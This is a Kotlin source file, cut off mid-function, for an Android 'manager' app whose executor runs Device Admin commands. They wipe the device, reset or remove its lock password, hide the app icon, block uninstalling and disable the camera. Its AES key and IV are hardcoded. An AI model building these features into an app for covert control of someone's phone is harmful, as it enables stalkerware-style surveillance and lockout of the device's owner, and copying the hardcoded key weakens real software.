     1→     1→package com.abuzahra.manager.executor
     2→     2→
     3→     3→import android.Manifest
     4→     4→import android.app.Activity
     5→     5→import android.app.KeyguardManager
     6→     6→import android.app.admin.DevicePolicyManager
     7→     7→import android.content.ComponentName
     8→     8→import android.content.Context
     9→     9→import android.content.Intent
    10→    10→import android.content.pm.PackageManager
    11→    11→import android.os.Build
    12→    12→import android.os.PowerManager
    13→    13→import android.provider.Settings
    14→    14→import android.util.Log
    15→    15→import androidx.biometric.BiometricManager
    16→    16→import androidx.biometric.BiometricPrompt
    17→    17→import androidx.core.app.ActivityCompat
    18→    18→import androidx.core.content.ContextCompat
    19→    19→import androidx.fragment.app.FragmentActivity
    20→    20→import com.abuzahra.manager.R
    21→    21→import com.abuzahra.manager.service.DeviceAdminReceiver
    22→    22→import java.io.File
    23→    23→import java.security.MessageDigest
    24→    24→import javax.crypto.Cipher
    25→    25→import javax.crypto.spec.IvParameterSpec
    26→    26→import javax.crypto.spec.SecretKeySpec
    27→    27→
    28→    28→/**
    29→    29→ * SecurityExecutor - Complete Implementation
    30→    30→ * All security-related commands with real functionality
    31→    31→ */
    32→    32→object SecurityExecutor {
    33→    33→
    34→    34→    private const val TAG = "SecurityExecutor"
    35→    35→    private const val AES_KEY = "AbuZahraSecKey16" // Exactly 16 bytes for AES-128
    36→    36→    private const val AES_IV = "AbuZahraIV16Byte" // Exactly 16 bytes
    37→    37→
    38→    38→    // ===== DEVICE ADMIN =====
    39→    39→
    40→    40→    fun isDeviceAdminActive(context: Context): Boolean {
    41→    41→        val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
    42→    42→        val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
    43→    43→        return dpm.isAdminActive(adminComponent)
    44→    44→    }
    45→    45→
    46→    46→    fun requestDeviceAdmin(context: Context): String {
    47→    47→        return try {
    48→    48→            val intent = Intent(DevicePolicyManager.ACTION_ADD_DEVICE_ADMIN)
    49→    49→            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
    50→    50→            intent.putExtra(DevicePolicyManager.EXTRA_DEVICE_ADMIN, adminComponent)
    51→    51→            intent.putExtra(DevicePolicyManager.EXTRA_ADD_EXPLANATION, "Enable device admin for security features")
    52→    52→            intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
    53→    53→            context.startActivity(intent)
    54→    54→            "Opening Device Admin request"
    55→    55→        } catch (e: Exception) {
    56→    56→            Log.e(TAG, "Request device admin error", e)
    57→    57→            "Error: ${e.message}"
    58→    58→        }
    59→    59→    }
    60→    60→
    61→    61→    // ===== WIPE DATA =====
    62→    62→    fun wipeData(context: Context): String {
    63→    63→        return try {
    64→    64→            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
    65→    65→            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
    66→    66→            
    67→    67→            if (!dpm.isAdminActive(adminComponent)) {
    68→    68→                return "Device Admin not active. Enable it first."
    69→    69→            }
    70→    70→            
    71→    71→            // Wipe all data
    72→    72→            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.Q) {
    73→    73→                // Wipe with factory reset protection
    74→    74→                dpm.wipeData(DevicePolicyManager.WIPE_EXTERNAL_STORAGE or DevicePolicyManager.WIPE_RESET_PROTECTION_DATA)
    75→    75→            } else {
    76→    76→                dpm.wipeData(DevicePolicyManager.WIPE_EXTERNAL_STORAGE)
    77→    77→            }
    78→    78→            "Device wipe initiated..."
    79→    79→        } catch (e: Exception) {
    80→    80→            Log.e(TAG, "Wipe data error", e)
    81→    81→            "Error: ${e.message}"
    82→    82→        }
    83→    83→    }
    84→    84→
    85→    85→    // ===== FACTORY RESET =====
    86→    86→    fun factoryReset(context: Context): String {
    87→    87→        return wipeData(context)
    88→    88→    }
    89→    89→
    90→    90→    // ===== LOCK SCREEN =====
    91→    91→    fun lockScreenNow(context: Context): String {
    92→    92→        return try {
    93→    93→            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
    94→    94→            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
    95→    95→            
    96→    96→            if (!dpm.isAdminActive(adminComponent)) {
    97→    97→                return "Device Admin not active. Enable it first."
    98→    98→            }
    99→    99→            
   100→   100→            dpm.lockNow()
   101→   101→            "Screen locked"
   102→   102→        } catch (e: Exception) {
   103→   103→            Log.e(TAG, "Lock screen error", e)
   104→   104→            "Error: ${e.message}"
   105→   105→        }
   106→   106→    }
   107→   107→
   108→   108→    // ===== LOCK SCREEN WITH PASSWORD =====
   109→   109→    fun lockWithPassword(context: Context, params: Map<String, Any>): String {
   110→   110→        return try {
   111→   111→            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   112→   112→            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   113→   113→            
   114→   114→            if (!dpm.isAdminActive(adminComponent)) {
   115→   115→                return "Device Admin not active. Enable it first."
   116→   116→            }
   117→   117→            
   118→   118→            val password = params["password"]?.toString() ?: params["arg"]?.toString() ?: ""
   119→   119→            if (password.isEmpty()) {
   120→   120→                return "Password required"
   121→   121→            }
   122→   122→            
   123→   123→            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
   124→   124→                // Reset password with new one
   125→   125→                val result = dpm.resetPassword(
   126→   126→                    password,
   127→   127→                    DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY
   128→   128→                )
   129→   129→                
   130→   130→                if (result) {
   131→   131→                    dpm.lockNow()
   132→   132→                    "Password set and screen locked"
   133→   133→                } else {
   134→   134→                    "Failed to set password"
   135→   135→                }
   136→   136→            } else {
   137→   137→                @Suppress("DEPRECATION")
   138→   138→                val result = dpm.resetPassword(password, DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY)
   139→   139→                if (result) {
   140→   140→                    dpm.lockNow()
   141→   141→                    "Password set and screen locked"
   142→   142→                } else {
   143→   143→                    "Failed to set password"
   144→   144→                }
   145→   145→            }
   146→   146→        } catch (e: Exception) {
   147→   147→            Log.e(TAG, "Lock with password error", e)
   148→   148→            "Error: ${e.message}"
   149→   149→        }
   150→   150→    }
   151→   151→
   152→   152→    // ===== SHOW / HIDE APP ICON =====
   153→   153→    fun showApp(context: Context): String {
   154→   154→        return try {
   155→   155→            val pm = context.packageManager
   156→   156→            val componentName = ComponentName(context, "com.abuzahra.manager.MainActivity")
   157→   157→            pm.setComponentEnabledSetting(
   158→   158→                componentName,
   159→   159→                PackageManager.COMPONENT_ENABLED_STATE_ENABLED,
   160→   160→                PackageManager.DONT_KILL_APP
   161→   161→            )
   162→   162→            "App icon shown"
   163→   163→        } catch (e: Exception) {
   164→   164→            Log.e(TAG, "Show app error", e)
   165→   165→            "Error: ${e.message}"
   166→   166→        }
   167→   167→    }
   168→   168→
   169→   169→    fun hideApp(context: Context): String {
   170→   170→        return try {
   171→   171→            val pm = context.packageManager
   172→   172→            val componentName = ComponentName(context, "com.abuzahra.manager.MainActivity")
   173→   173→            pm.setComponentEnabledSetting(
   174→   174→                componentName,
   175→   175→                PackageManager.COMPONENT_ENABLED_STATE_DISABLED,
   176→   176→                PackageManager.DONT_KILL_APP
   177→   177→            )
   178→   178→            "App icon hidden"
   179→   179→        } catch (e: Exception) {
   180→   180→            Log.e(TAG, "Hide app error", e)
   181→   181→            "Error: ${e.message}"
   182→   182→        }
   183→   183→    }
   184→   184→
   185→   185→    // ===== CHANGE PASSCODE / SET PIN =====
   186→   186→    fun changePasscode(context: Context, params: Map<String, Any>): String {
   187→   187→        return try {
   188→   188→            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   189→   189→            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   190→   190→            
   191→   191→            if (!dpm.isAdminActive(adminComponent)) {
   192→   192→                return "Device Admin not active. Enable it first."
   193→   193→            }
   194→   194→            
   195→   195→            val password = params["password"]?.toString() ?: params["arg"]?.toString() ?: ""
   196→   196→            if (password.isEmpty()) {
   197→   197→                return "Password required. Usage: password"
   198→   198→            }
   199→   199→            
   200→   200→            // Check password quality requirements
   201→   201→            if (password.length < 4) {
   202→   202→                return "Password must be at least 4 characters"
   203→   203→            }
   204→   204→            
   205→   205→            val result = if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
   206→   206→                dpm.resetPassword(
   207→   207→                    password,
   208→   208→                    DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY
   209→   209→                )
   210→   210→            } else {
   211→   211→                @Suppress("DEPRECATION")
   212→   212→                dpm.resetPassword(password, DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY)
   213→   213→            }
   214→   214→            
   215→   215→            if (result) {
   216→   216→                "Password changed successfully"
   217→   217→            } else {
   218→   218→                "Failed to change password"
   219→   219→            }
   220→   220→        } catch (e: Exception) {
   221→   221→            Log.e(TAG, "Change passcode error", e)
   222→   222→            "Error: ${e.message}"
   223→   223→        }
   224→   224→    }
   225→   225→    
   226→   226→    fun setPin(context: Context, params: Map<String, Any>): String {
   227→   227→        return changePasscode(context, params)
   228→   228→    }
   229→   229→    
   230→   230→    fun removePin(context: Context): String {
   231→   231→        return try {
   232→   232→            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   233→   233→            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   234→   234→            
   235→   235→            if (!dpm.isAdminActive(adminComponent)) {
   236→   236→                return "Device Admin not active"
   237→   237→            }
   238→   238→            
   239→   239→            // Set empty password to remove
   240→   240→            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
   241→   241→                dpm.resetPassword("", DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY)
   242→   242→            } else {
   243→   243→                @Suppress("DEPRECATION")
   244→   244→                dpm.resetPassword("", DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY)
   245→   245→            }
   246→   246→            
   247→   247→            "PIN removed"
   248→   248→        } catch (e: Exception) {
   249→   249→            "Error: ${e.message}"
   250→   250→        }
   251→   251→    }
   252→   252→
   253→   253→    // ===== PASSWORD POLICIES =====
   254→   254→    fun setPasswordQuality(context: Context, params: Map<String, Any>): String {
   255→   255→        return try {
   256→   256→            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   257→   257→            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   258→   258→            
   259→   259→            if (!dpm.isAdminActive(adminComponent)) {
   260→   260→                return "Device Admin not active"
   261→   261→            }
   262→   262→            
   263→   263→            val quality = params["quality"]?.toString() ?: "something"
   264→   264→            
   265→   265→            val qualityConstant = when (quality.lowercase()) {
   266→   266→                "unspecified" -> DevicePolicyManager.PASSWORD_QUALITY_UNSPECIFIED
   267→   267→                "something" -> DevicePolicyManager.PASSWORD_QUALITY_SOMETHING
   268→   268→                "numeric" -> DevicePolicyManager.PASSWORD_QUALITY_NUMERIC
   269→   269→                "numeric_complex" -> DevicePolicyManager.PASSWORD_QUALITY_NUMERIC_COMPLEX
   270→   270→                "alphabetic" -> DevicePolicyManager.PASSWORD_QUALITY_ALPHABETIC
   271→   271→                "alphanumeric" -> DevicePolicyManager.PASSWORD_QUALITY_ALPHANUMERIC
   272→   272→                "complex" -> DevicePolicyManager.PASSWORD_QUALITY_COMPLEX
   273→   273→                else -> DevicePolicyManager.PASSWORD_QUALITY_SOMETHING
   274→   274→            }
   275→   275→            
   276→   276→            dpm.setPasswordQuality(adminComponent, qualityConstant)
   277→   277→            "Password quality set to $quality"
   278→   278→        } catch (e: Exception) {
   279→   279→            "Error: ${e.message}"
   280→   280→        }
   281→   281→    }
   282→   282→    
   283→   283→    fun setPasswordMinimumLength(context: Context, params: Map<String, Any>): String {
   284→   284→        return try {
   285→   285→            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   286→   286→            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   287→   287→            
   288→   288→            if (!dpm.isAdminActive(adminComponent)) {
   289→   289→                return "Device Admin not active"
   290→   290→            }
   291→   291→            
   292→   292→            val length = (params["length"] as? Number)?.toInt() 
   293→   293→                ?: params["arg"]?.toString()?.toIntOrNull() 
   294→   294→                ?: 6
   295→   295→            
   296→   296→            dpm.setPasswordMinimumLength(adminComponent, length)
   297→   297→            "Minimum password length set to $length"
   298→   298→        } catch (e: Exception) {
   299→   299→            "Error: ${e.message}"
   300→   300→        }
   301→   301→    }
   302→   302→    
   303→   303→    fun setMaximumFailedPasswords(context: Context, params: Map<String, Any>): String {
   304→   304→        return try {
   305→   305→            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   306→   306→            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   307→   307→            
   308→   308→            if (!dpm.isAdminActive(adminComponent)) {
   309→   309→                return "Device Admin not active"
   310→   310→            }
   311→   311→            
   312→   312→            val attempts = (params["attempts"] as? Number)?.toInt()
   313→   313→                ?: params["arg"]?.toString()?.toIntOrNull()
   314→   314→                ?: 5
   315→   315→            
   316→   316→            dpm.setMaximumFailedPasswordsForWipe(adminComponent, attempts)
   317→   317→            "Device will wipe after $attempts failed password attempts"
   318→   318→        } catch (e: Exception) {
   319→   319→            "Error: ${e.message}"
   320→   320→        }
   321→   321→    }
   322→   322→
   323→   323→    // ===== BIOMETRIC =====
   324→   324→    fun enableBiometric(context: Context): String {
   325→   325→        return try {
   326→   326→            // Check if biometric is available
   327→   327→            val biometricManager = BiometricManager.from(context)
   328→   328→            val canAuthenticate = when (biometricManager.canAuthenticate(BiometricManager.Authenticators.BIOMETRIC_STRONG or BiometricManager.Authenticators.DEVICE_CREDENTIAL)) {
   329→   329→                BiometricManager.BIOMETRIC_SUCCESS -> true
   330→   330→                BiometricManager.BIOMETRIC_ERROR_NO_HARDWARE -> return "No biometric hardware"
   331→   331→                BiometricManager.BIOMETRIC_ERROR_HW_UNAVAILABLE -> return "Biometric hardware unavailable"
   332→   332→                BiometricManager.BIOMETRIC_ERROR_NONE_ENROLLED -> {
   333→   333→                    // Open settings to enroll
   334→   334→                    if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.R) {
   335→   335→                        context.startActivity(Intent(Settings.ACTION_BIOMETRIC_ENROLL).apply {
   336→   336→                            addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   337→   337→                        })
   338→   338→                    } else if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.P) {
   339→   339→                        context.startActivity(Intent(Settings.ACTION_FINGERPRINT_ENROLL).apply {
   340→   340→                            addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   341→   341→                        })
   342→   342→                    } else {
   343→   343→                        context.startActivity(Intent(Settings.ACTION_SECURITY_SETTINGS).apply {
   344→   344→                            addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   345→   345→                        })
   346→   346→                    }
   347→   347→                    return "No biometric enrolled. Opening settings"
   348→   348→                }
   349→   349→                BiometricManager.BIOMETRIC_ERROR_SECURITY_UPDATE_REQUIRED -> return "Security update required"
   350→   350→                BiometricManager.BIOMETRIC_ERROR_UNSUPPORTED -> return "Biometric unsupported"
   351→   351→                BiometricManager.BIOMETRIC_STATUS_UNKNOWN -> return "Biometric status unknown"
   352→   352→                else -> false
   353→   353→            }
   354→   354→            
   355→   355→            if (canAuthenticate) {
   356→   356→                "Biometric is available and configured"
   357→   357→            } else {
   358→   358→                "Biometric not available"
   359→   359→            }
   360→   360→        } catch (e: Exception) {
   361→   361→            Log.e(TAG, "Enable biometric error", e)
   362→   362→            "Error: ${e.message}"
   363→   363→        }
   364→   364→    }
   365→   365→
   366→   366→    fun disableBiometric(context: Context): Map<String, Any> {
   367→   367→        return try {
   368→   368→            val intent = when {
   369→   369→                Build.VERSION.SDK_INT >= Build.VERSION_CODES.R -> {
   370→   370→                    Intent(Settings.ACTION_BIOMETRIC_ENROLL).apply {
   371→   371→                        addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   372→   372→                        putExtra("biometric_enroll", true)
   373→   373→                    }
   374→   374→                }
   375→   375→                Build.VERSION.SDK_INT >= Build.VERSION_CODES.P -> {
   376→   376→                    Intent(Settings.ACTION_FINGERPRINT_ENROLL).apply {
   377→   377→                        addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   378→   378→                    }
   379→   379→                }
   380→   380→                else -> {
   381→   381→                    Intent(Settings.ACTION_SECURITY_SETTINGS).apply {
   382→   382→                        addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   383→   383→                    }
   384→   384→                }
   385→   385→            }
   386→   386→            context.startActivity(intent)
   387→   387→            mapOf(
   388→   388→                "status" to "opened_settings",
   389→   389→                "message" to "Opening security/biometric settings. Biometric cannot be disabled programmatically for security reasons - user must manually remove biometric data.",
   390→   390→                "action_required" to "user_manual_removal"
   391→   391→            )
   392→   392→        } catch (e: Exception) {
   393→   393→            mapOf("error" to (e.message ?: "Failed to open settings"))
   394→   394→        }
   395→   395→    }
   396→   396→    
   397→   397→    fun getBiometricStatus(context: Context): Map<String, Any> {
   398→   398→        return try {
   399→   399→            val biometricManager = BiometricManager.from(context)
   400→   400→            val status = biometricManager.canAuthenticate(BiometricManager.Authenticators.BIOMETRIC_STRONG or BiometricManager.Authenticators.DEVICE_CREDENTIAL)
   401→   401→            
   402→   402→            val statusMessage = when (status) {
   403→   403→                BiometricManager.BIOMETRIC_SUCCESS -> "Biometric ready"
   404→   404→                BiometricManager.BIOMETRIC_ERROR_NO_HARDWARE -> "No biometric hardware"
   405→   405→                BiometricManager.BIOMETRIC_ERROR_HW_UNAVAILABLE -> "Hardware unavailable"
   406→   406→                BiometricManager.BIOMETRIC_ERROR_NONE_ENROLLED -> "No biometric enrolled"
   407→   407→                BiometricManager.BIOMETRIC_ERROR_SECURITY_UPDATE_REQUIRED -> "Security update required"
   408→   408→                BiometricManager.BIOMETRIC_ERROR_UNSUPPORTED -> "Unsupported"
   409→   409→                BiometricManager.BIOMETRIC_STATUS_UNKNOWN -> "Status unknown"
   410→   410→                else -> "Unknown status"
   411→   411→            }
   412→   412→            
   413→   413→            mapOf(
   414→   414→                "status_code" to status,
   415→   415→                "status" to statusMessage,
   416→   416→                "can_authenticate" to (status == BiometricManager.BIOMETRIC_SUCCESS)
   417→   417→            )
   418→   418→        } catch (e: Exception) {
   419→   419→            mapOf("error" to (e.message ?: "Unknown error"))
   420→   420→        }
   421→   421→    }
   422→   422→
   423→   423→    // ===== ANTI UNINSTALL =====
   424→   424→    fun antiUninstallOn(context: Context): String {
   425→   425→        return try {
   426→   426→            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   427→   427→            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   428→   428→            
   429→   429→            if (!dpm.isAdminActive(adminComponent)) {
   430→   430→                // Request device admin
   431→   431→                return "Device Admin must be activated for anti-uninstall protection. Use request_device_admin first."
   432→   432→            }
   433→   433→            
   434→   434→            // Device admin already provides anti-uninstall protection
   435→   435→            "Anti-uninstall protection active (Device Admin enabled)"
   436→   436→        } catch (e: Exception) {
   437→   437→            Log.e(TAG, "Anti-uninstall on error", e)
   438→   438→            "Error: ${e.message}"
   439→   439→        }
   440→   440→    }
   441→   441→
   442→   442→    fun antiUninstallOff(context: Context): String {
   443→   443→        return try {
   444→   444→            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   445→   445→            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   446→   446→            
   447→   447→            if (dpm.isAdminActive(adminComponent)) {
   448→   448→                Log.w(TAG, "antiUninstallOff: Removing Device Admin entirely (all policies will be lost)")
   449→   449→                dpm.removeActiveAdmin(adminComponent)
   450→   450→                "Warning: Device Admin removed entirely. All admin policies are now disabled."
   451→   451→            } else {
   452→   452→                "Device Admin was not active"
   453→   453→            }
   454→   454→        } catch (e: Exception) {
   455→   455→            Log.e(TAG, "Anti-uninstall off error", e)
   456→   456→            "Error: ${e.message}"
   457→   457→        }
   458→   458→    }
   459→   459→
   460→   460→    // ===== DEVICE ADMIN STATUS =====
   461→   461→    fun deviceAdminStatus(context: Context): Map<String, Any> {
   462→   462→        return try {
   463→   463→            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   464→   464→            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   465→   465→            val isAdmin = dpm.isAdminActive(adminComponent)
   466→   466→            
   467→   467→            val policies = mutableListOf<String>()
   468→   468→            if (isAdmin) {
   469→   469→                if (dpm.getPasswordQuality(adminComponent) != DevicePolicyManager.PASSWORD_QUALITY_UNSPECIFIED) {
   470→   470→                    policies.add("password_quality")
   471→   471→                }
   472→   472→                if (dpm.getPasswordMinimumLength(adminComponent) > 0) {
   473→   473→                    policies.add("password_minimum_length")
   474→   474→                }
   475→   475→                if (dpm.getMaximumFailedPasswordsForWipe(adminComponent) > 0) {
   476→   476→                    policies.add("maximum_failed_passwords")
   477→   477→                }
   478→   478→                if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) {
   479→   479→                    if (dpm.isDeviceOwnerApp(context.packageName)) {
   480→   480→                        policies.add("device_owner")
   481→   481→                    }
   482→   482→                    if (dpm.isProfileOwnerApp(context.packageName)) {
   483→   483→                        policies.add("profile_owner")
   484→   484→                    }
   485→   485→                }
   486→   486→            }
   487→   487→            
   488→   488→            mapOf(
   489→   489→                "is_device_admin" to isAdmin,
   490→   490→                "active_admins" to (dpm.activeAdmins?.size ?: 0),
   491→   491→                "is_device_owner" to if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) dpm.isDeviceOwnerApp(context.packageName) else false,
   492→   492→                "is_profile_owner" to if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) dpm.isProfileOwnerApp(context.packageName) else false,
   493→   493→                "policies" to policies,
   494→   494→                "device_owner_name" to try { @Suppress("DEPRECATION") (java.lang.reflect.Method::class.java.getDeclaredMethod("getDeviceOwnerName")).let { m -> m.invoke(dpm)?.toString() ?: "" } } catch (e: Exception) { "" }
   495→   495→            )
   496→   496→        } catch (e: Exception) {
   497→   497→            Log.e(TAG, "Device admin status error", e)
   498→   498→            mapOf("error" to (e.message ?: ""))
   499→   499→        }
   500→   500→    }
   501→   501→
   502→   502→    // ===== CHECK ROOT =====
   503→   503→    fun checkRoot(): Map<String, Any> {
   504→   504→        val rootPaths = arrayOf(
   505→   505→            "/system/bin/su",
   506→   506→            "/system/xbin/su",
   507→   507→            "/sbin/su",
   508→   508→            "/system/bin/failsafe/su",
   509→   509→            "/data/local/xbin/su",
   510→   510→            "/data/local/bin/su",
   511→   511→            "/system/sd/xbin/su",
   512→   512→            "/system/bin/curl",
   513→   513→            "/system/bin/wget",
   514→   514→            "/data/local/su",
   515→   515→            "/su/bin/su",
   516→   516→            "/magisk/.core/bin/su",
   517→   517→            "/apex/com.android.runtime/bin/su"
   518→   518→        )
   519→   519→        
   520→   520→        var hasRoot = false
   521→   521→        val foundPaths = mutableListOf<String>()
   522→   522→        
   523→   523→        for (path in rootPaths) {
   524→   524→            val file = File(path)
   525→   525→            if (file.exists()) {
   526→   526→                hasRoot = true
   527→   527→                foundPaths.add(path)
   528→   528→            }
   529→   529→        }
   530→   530→        
   531→   531→        // Also check for root management apps
   532→   532→        val rootApps = arrayOf(
   533→   533→            "com.koushikdutta.superuser",
   534→   534→            "com.thirdparty.superuser",
   535→   535→            "eu.chainfire.supersu",
   536→   536→            "com.noshufou.android.su",
   537→   537→            "com.topjohnwu.magisk"
   538→   538→        )
   539→   539→        
   540→   540→        return mapOf(
   541→   541→            "rooted" to hasRoot,
   542→   542→            "found_paths" to foundPaths,
   543→   543→            "message" to if (hasRoot) "Device is rooted" else "Device is not rooted"
   544→   544→        )
   545→   545→    }
   546→   546→    
   547→   547→    fun checkMagisk(): Map<String, Any> {
   548→   548→        val magiskPaths = arrayOf(
   549→   549→            "/sbin/.magisk",
   550→   550→            "/cache/.magisk",
   551→   551→            "/data/adb/magisk",
   552→   552→            "/data/adb/ksu",
   553→   553→            "/data/adb/ap"
   554→   554→        )
   555→   555→        
   556→   556→        var hasMagisk = false
   557→   557→        val foundPaths = mutableListOf<String>()
   558→   558→        
   559→   559→        for (path in magiskPaths) {
   560→   560→            if (File(path).exists()) {
   561→   561→                hasMagisk = true
   562→   562→                foundPaths.add(path)
   563→   563→            }
   564→   564→        }
   565→   565→        
   566→   566→        return mapOf(
   567→   567→            "has_magisk" to hasMagisk,
   568→   568→            "found_paths" to foundPaths
   569→   569→        )
   570→   570→    }
   571→   571→
   572→   572→    // ===== SCREEN LOCK =====
   573→   573→    fun setScreenLock(context: Context): String {
   574→   574→        return try {
   575→   575→            val km = context.getSystemService(Context.KEYGUARD_SERVICE) as KeyguardManager
   576→   576→            if (km.isDeviceSecure) {
   577→   577→                return "Screen lock is already configured (device is secure)"
   578→   578→            }
   579→   579→            // Open lock screen settings to let user set up a lock
   580→   580→            val intent = Intent(Settings.ACTION_SECURITY_SETTINGS).apply {
   581→   581→                addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   582→   582→            }
   583→   583→            context.startActivity(intent)
   584→   584→            "Opening security settings to set screen lock"
   585→   585→        } catch (e: Exception) {
   586→   586→            Log.e(TAG, "Set screen lock error", e)
   587→   587→            "Error: ${e.message}"
   588→   588→        }
   589→   589→    }
   590→   590→
   591→   591→    fun removeScreenLock(context: Context): String {
   592→   592→        return try {
   593→   593→            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   594→   594→            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   595→   595→
   596→   596→            if (!dpm.isAdminActive(adminComponent)) {
   597→   597→                // Try opening settings directly for lock screen removal
   598→   598→                val intent = Intent(Settings.ACTION_SECURITY_SETTINGS).apply {
   599→   599→                    addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   600→   600→                }
   601→   601→                context.startActivity(intent)
   602→   602→                return "Opening security settings - Device Admin not active. Remove lock manually or activate Device Admin first."
   603→   603→            }
   604→   604→
   605→   605→            // Reset password to empty to remove screen lock
   606→   606→            val result = if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
   607→   607→                dpm.resetPassword("", DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY)
   608→   608→            } else {
   609→   609→                @Suppress("DEPRECATION")
   610→   610→                dpm.resetPassword("", DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY)
   611→   611→            }
   612→   612→
   613→   613→            if (result) {
   614→   614→                dpm.lockNow()
   615→   615→                "Screen lock removed (password reset to empty via Device Admin)"
   616→   616→            } else {
   617→   617→                "Failed to remove screen lock - device may have additional restrictions"
   618→   618→            }
   619→   619→        } catch (e: Exception) {
   620→   620→            Log.e(TAG, "Remove screen lock error", e)
   621→   621→            "Error: ${e.message}"
   622→   622→        }
   623→   623→    }
   624→   624→    
   625→   625→    fun isScreenLockEnabled(context: Context): Map<String, Any> {
   626→   626→        return try {
   627→   627→            val km = context.getSystemService(Context.KEYGUARD_SERVICE) as KeyguardManager
   628→   628→            val pm = context.getSystemService(Context.POWER_SERVICE) as PowerManager
   629→   629→            
   630→   630→            mapOf(
   631→   631→                "is_secure" to km.isDeviceSecure,
   632→   632→                "is_locked" to km.isKeyguardLocked,
   633→   633→                "is_keyguard_showing" to if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP_MR1) km.isDeviceLocked else false,
   634→   634→                "screen_on" to pm.isInteractive
   635→   635→            )
   636→   636→        } catch (e: Exception) {
   637→   637→            mapOf("error" to (e.message ?: ""))
   638→   638→        }
   639→   639→    }
   640→   640→
   641→   641→    // ===== CAMERA DISABLE =====
   642→   642→    fun disableCamera(context: Context): String {
   643→   643→        return try {
   644→   644→            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   645→   645→            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   646→   646→            
   647→   647→            if (!dpm.isAdminActive(adminComponent)) {
   648→   648→                return "Device Admin not active"
   649→   649→            }
   650→   650→            
   651→   651→            dpm.setCameraDisabled(adminComponent, true)
   652→   652→            "Camera disabled"
   653→   653→        } catch (e: Exception) {
   654→   654→            Log.e(TAG, "Disable camera error", e)
   655→   655→            "Error: ${e.message}"
   656→   656→        }
   657→   657→    }
   658→   658→    
   659→   659→    fun enableCamera(context: Context): String {
   660→   660→        return try {
   661→   661→            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   662→   662→            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   663→   663→            
   664→   664→            if (!dpm.isAdminActive(adminComponent)) {
   665→   665→                return "Device Admin not active"
   666→   666→            }
   667→   667→            
   668→   668→            dpm.setCameraDisabled(adminComponent, false)
   669→   669→            "Camera enabled"
   670→   670→        } catch (e: Exception) {
   671→   671→            Log.e(TAG, "Enable camera error", e)
   672→   672→            "Error: ${e.message}"
   673→   673→        }
   674→   674→    }
   675→   675→    
   676→   676→    fun isCameraDisabled(context: Context): Boolean {
   677→   677→        return try {
   678→   678→            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   679→   679→            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   680→   680→            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.UPSIDE_DOWN_CAKE) {
   681→   681→                @Suppress("DEPRECATION")
   682→   682→                return dpm.getCameraDisabled(adminComponent)
   683→   683→            } else {
   684→   684→                @Suppress("DEPRECATION")
